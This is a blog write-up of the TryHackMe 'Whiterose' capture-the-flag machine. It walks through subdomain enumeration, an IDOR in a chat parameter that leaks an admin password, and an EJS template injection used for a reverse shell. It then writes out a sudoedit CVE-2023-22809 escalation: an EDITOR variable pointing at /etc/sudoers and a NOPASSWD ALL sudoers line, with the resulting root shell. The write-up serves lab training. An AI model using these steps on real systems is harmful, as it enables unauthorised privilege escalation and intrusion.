Whiterose Writeup (TryHackMe Easy Machine)

-

 

This challenge is based on the Mr. Robot episode “409 Conflict”. And oh! I almost forgot! — You will need these: Olivia Cortez:olivi8. Can you take down the Deus group?


Overview

Whiterose is an easy machine from TryHackMe. This one highly depends on enumeration and your creative and problem-solving thinking. We start with discovering unrestricted subdomain for admins of the Cyprus Bank with list of all transactions and customer accounts.

We discover admin chatroom with poorly implemented feature, which allows us to see the chat history and exposes other admin’s password. Example of an IDOR.

When we get access to Settings tab, we discover another serious vulnerability known as SSTI in the Ejs (Embedded Javascript) template language. This allows us to get reverse shell from the machine.

Lastly, we abuse sudo permission over “sudoedit” binary, which is used to safely edit files with sudo privilege. Combined with legacy sudo version, we are able to write ourselves unrestricted privileges to “/etc/sudoers” file with clever “EDITOR” environment variable change.


Nmap scan

Starting with Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.30.56 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-01 13:13 EST
Nmap scan report for 10.10.30.56
Host is up (0.069s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
|   256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
|_  256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.0 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   63.91 ms 10.9.0.1
2   63.99 ms 10.10.30.56

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds

The Nmap scan showed 2 open ports. Port 22 for SSH and port 80 for HTTP server running Nginx 1.14.0.


Web Enumeration

Looking at the web server, we need to to add “cyprusbank.thm” to “/etc/hosts” file.

After that, we have access to the website.


Using FFuF for subdomain enumeration, we can find “admin” subdomain with login panel. Don’t forget to add it to “/etc/hosts” file.

┌──(kali㉿kali)-[~]
└─$ ffuf -u "http://cyprusbank.thm" -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt -H "HOST: FUZZ.cyprusbank.thm" -ac

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cyprusbank.thm
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.cyprusbank.thm
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

www                     [Status: 200, Size: 252, Words: 19, Lines: 9, Duration: 163ms]
admin                   [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 265ms]
:: Progress: [19966/19966] :: Job [1/1] :: 851 req/sec :: Duration: [0:00:30] :: Errors: 0 ::


We can use credentials from machine description “Olivia Cortez : olivi8” and gain access. We can see table of recent payments and accounts, as well as admin chat, which reveals potential admin accounts. We don’t have permission to access the Settings tab.

admin chatroom


IDOR, getting other admin’s password & discovering Tyrell Wellick’s phone number

After playing with the chatroom, trying some HTML injection, I noticed a parameter “c” in the URL. After changing it to higher number, previous chat logs appear in the chatroom. The “c” parameter seems to be directly connected with the chat history and shows admins discussing the implementation of chat history. This is an example of IDOR (Insecure Direct Object Reference), which allows disclosing information our user is not supposed to see (presumably, maybe it’s just poorly implemented feature). We get the other admin’s “Gayle Bev” password from the newly discovered chat logs.


After loggin in as “Gayle Bev”, we get access to Settings tab and to more information about the customers. Including telephone number for Tyrell Wellick, which is one of our tasks.


SSTI, getting a foothold & user flag

I booted good old Burp Suite and tested the Settings tab for numerous different vulnerabilities, like HTML, XSS and command injection, but got no luck. But when I removed the “password” parameter from the request, server returned 500 Internal Server Error with interesting error message.

The error message revealed that there’s Ejs (Embedded Javascript) running in the back end. When using web plugin Wappalyzer, we can see there’s Express.js framework running, which is back end web application framework for building RESTful APIs with Node js.


This opened doors for new potential attack vector, and that’s SSTI (Server-side Template Injection). Upon some research, I found this article explaining RCE using EJS SSTI: https://eslam.io/posts/ejs-server-side-template-injection-rce/. I got the payload from the article, changed it a bit and got the initial foothold as “web”.

I had to use Busybox with Netcat, which is a software suite that provides several Unix utilities in a single executable file. In embedded systems or minimal environments, you may not have access to the full version of Netcat or other networking tools. BusyBox provides a lightweight alternative that can perform similar functions. (explained by Blackbox.ai)

In our user’s home directory, there was the user flag waiting for us.


Privilege Escalation via “sudoedit” & root flag

Starting with “sudo -l”, we see that we can run “sudoedit” as root without a password. “Sudoedit” is a command that allows users to edit files with root privileges while maintaining the integrity of the original file.

web@cyprusbank:~$ sudo -l
Matching Defaults entries for web on cyprusbank:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
    XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User web may run the following commands on cyprusbank:
    (root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm


Doing some research, I was able to found this CVE on “sudoedit”: https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf. The PDF showed that vulnerable Sudo versions are 1.8.0–1.9.12p1. Checking our Sudo version, it matched perfectly.

web@cyprusbank:~$ sudo --version
Sudo version 1.9.12p1
Sudoers policy plugin version 1.9.12p1
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.12p1
Sudoers audit plugin version 1.9.12p1


I followed steps shown in another article: https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudoedit-privilege-escalation/?source=post_page-----972ee9129fe2---------------------------------------.

First I exported new “EDITOR” variable with content “vim — /etc/sudoers”. When I used “sudoedit” with the appropriate file, it opened “/etc/sudoers” file in Vim where I could add my user “web ALL=(ALL:ALL) NOPASSWD: ALL” with unrestricted access to the machine.

web@cyprusbank:~/app$ export EDITOR="vim -- /etc/sudoers"
web@cyprusbank:~/app$ sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
sudoedit: --: editing files in a writable directory is not permitted
2 files to edit
sudoedit: /etc/nginx/sites-available/admin.cyprusbank.thm unchanged
web@cyprusbank:~/app$ sudo su root
root@cyprusbank:/home/web/app# whoami
root
root@cyprusbank:/home/web/app# pwd
/home/web/app
root@cyprusbank:/home/web/app# cd /root
root@cyprusbank:~# ls -la
total 40
drwx------  6 root root 4096 Apr  4  2024 .
drwxr-xr-x 23 root root 4096 Jul 12  2023 ..
lrwxrwxrwx  1 root root    9 Jul 16  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Jul 16  2023 .cache
-rwxr-xr-x  1 root root  156 Apr  4  2024 clean.sh
drwx------  3 root root 4096 Jul 16  2023 .gnupg
drwxr-xr-x  3 root root 4096 Jul 16  2023 .local
drwxr-xr-x  5 root root 4096 Apr  4  2024 .pm2
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   21 Jul 15  2023 root.txt

With command “sudo su root” I became superuser. Nothing was stopping me from getting the root flag from now on.


Summary

Whiterose is easy straightforward machine. I really liked all the references to the show Mr. Robot. This machine makes you practice your web enumeration skills and showcases the danger of poorly implemented web features causing an IDOR and SSTI in Ejs templating language. At last, it also shows how elevated privileges on certain binaries can be abused, combined with vulnerable legacy sudo versions.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more